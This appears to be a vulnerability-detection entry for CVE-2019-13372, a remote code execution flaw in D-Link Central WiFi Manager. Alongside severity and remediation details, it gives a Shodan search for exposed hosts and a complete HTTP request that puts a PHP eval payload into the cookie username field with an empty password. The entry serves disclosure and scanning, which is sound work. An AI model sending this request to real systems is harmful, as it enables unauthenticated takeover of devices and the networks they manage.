| Title | D-Link Central WiFi Manager CWM(100) - Remote Code Execution |
|---|---|
| Author | DhiyaneshDK |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary PHP code via cookie manipulation, leading to complete compromise of the D-Link Central WiFi Manager and potential access to all managed WiFi networks. |
| Remediation | Update D-Link Central WiFi Manager to version 1.03R0100_BETA6 or later. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93075 |
| CVE ID | CVE-2019-13372 |
| CWE ID | CWE-94 |
| Shodan Query | html:"D-Link Central WiFiManager" |
| Tags | cve cve2019 d-link wifimanager vkev vuln |
/web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie’s username field allows eval injection, and an empty password bypasses authentication.
GET /index.php/Index/index HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Cookie: username=',0,"",1,"0")%3becho%20"JPbHBEVqxd"%3b//";password=
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-13372.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-13372.pcap
N/AN/A